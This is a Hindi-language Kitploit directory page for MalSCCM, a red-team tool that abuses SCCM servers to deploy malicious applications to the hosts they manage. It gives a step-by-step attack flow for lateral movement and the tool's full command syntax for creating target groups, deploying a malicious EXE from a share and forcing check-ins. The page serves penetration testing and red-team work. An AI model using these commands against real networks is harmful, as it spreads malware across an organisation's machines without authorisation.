Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
MalSCCM — SCCM सर्वरों का दुरुपयोग करके, प्रबंधित होस्टों पर दुर्भावनापूर्ण एप्लिकेशन तैनात करें, जिससे पार्श्व गति और रेड टीम संचालन किया जा सके। | Kitploit
उपकरण/GitHubGitHub/nettitude/malsccm
शोषणपार्श्व आंदोलनपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubnettitude/malsccm

MalSCCM

SCCM सर्वरों का दुरुपयोग करके, प्रबंधित होस्टों पर दुर्भावनापूर्ण एप्लिकेशन तैनात करें, जिससे पार्श्व गति और रेड टीम संचालन किया जा सके।

रिपॉजिटरी देखें
2563834 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

MalSCCM

यह उपकरण आपको स्थानीय या दूरस्थ SCCM सर्वरों का दुरुपयोग करके उनके द्वारा प्रबंधित होस्ट पर दुर्भावनापूर्ण एप्लिकेशन तैनात करने की अनुमति देता है। इस उपकरण का उपयोग करने के लिए आपकी वर्तमान प्रक्रिया के पास SCCM सर्वर पर व्यवस्थापक अधिकार होने चाहिए।

आमतौर पर SCCM की तैनाती में प्रबंधन सर्वर और प्राथमिक सर्वर एक ही होस्ट पर होते हैं, ऐसी स्थिति में locate कमांड से लौटाए गए होस्ट को प्राथमिक सर्वर के रूप में उपयोग किया जा सकता है।

यदि ऐसा नहीं है, तो आपको locate से लौटाए गए प्रबंधन होस्ट से समझौता करना होगा ताकि आप उस होस्ट पर फिर से locate चला सकें और प्राथमिक सर्वर होस्टनाम प्राप्त कर सकें। एक बार जब आपके पास वह और व्यवस्थापक पहुंच हो, तो आप तैयार हैं!

ब्लॉग

अधिक जानकारी के लिए नीचे दिए गए ब्लॉग को देखें।

  • https://labs.nettitude.com/blog/introducing-malsccm/

श्रेय

PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM) को भारी श्रेय, जिस पर यह सब आधारित है, यह @harmj0y, @jaredcatkinson, @enigma0x3, @mattifestation के काम के बिना नहीं हो पाता।

हमला प्रवाह

  • क्लाइंट से समझौता करें, प्रबंधन सर्वर खोजने के लिए locate का उपयोग करें
  • प्रबंधन सर्वर से समझौता करें, प्राथमिक सर्वर खोजने के लिए locate का उपयोग करें
  • प्राथमिक सर्वर पर Inspect का उपयोग करके देखें कि आप किसे लक्षित कर सकते हैं
  • उन मशीनों के लिए एक नया उपकरण समूह बनाएं जिनमें आप पार्श्व रूप से जाना चाहते हैं
  • अपने लक्ष्यों को नए समूह में जोड़ें
  • एक एप्लिकेशन बनाएं जो विश्व-पठनीय शेयर पर एक दुर्भावनापूर्ण EXE की ओर इंगित करता हो
  • एप्लिकेशन को लक्ष्य समूह में तैनात करें
  • लक्ष्य समूह को अपडेट के लिए चेक-इन करने के लिए बाध्य करें
  • लाभ...
  • एप्लिकेशन और तैनाती को साफ करें
  • समूह हटाएं
  • सहायता मेनू

    नीचे सूचीबद्ध कमांड में वैकल्पिक पैरामीटर <> में हैं।

    root@kitploit:~
    Attempt to find the SCCM management and primary servers:
        MalSCCM.exe locate
    
    Inspect the primary server to gather SCCM information:
        MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers>
    
    Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users:
        MalSCCM.exe group /create /groupname:example /grouptype:[user|device] </server:PrimarySiteHostname>
        MalSCCM.exe group /delete /groupname:example </server:PrimarySiteHostname>
        MalSCCM.exe group /addhost /groupname:example /host:examplehost </server:PrimarySiteHostname>
        MalSCCM.exe group /adduser /groupname:example /user:exampleuser </server:PrimarySiteHostname>
    
    Create/Deploy/Delete malicious applications:
        MalSCCM.exe app /create /name:appname /uncpath:""\\unc\path"" </server:PrimarySiteHostname>
        MalSCCM.exe app /delete /name:appname </server:PrimarySiteHostname>
        MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 </server:PrimarySiteHostname>
        MalSCCM.exe app /deletedeploy /name:appname </server:PrimarySiteHostname>
        MalSCCM.exe app /cleanup /name:appname </server:PrimarySiteHostname>
    
    Force devices of a group to checkin within a couple minutes:
        MalSCCM.exe checkin /groupname:example </server:PrimarySiteHostname>
    
    टूल डाउनलोड करें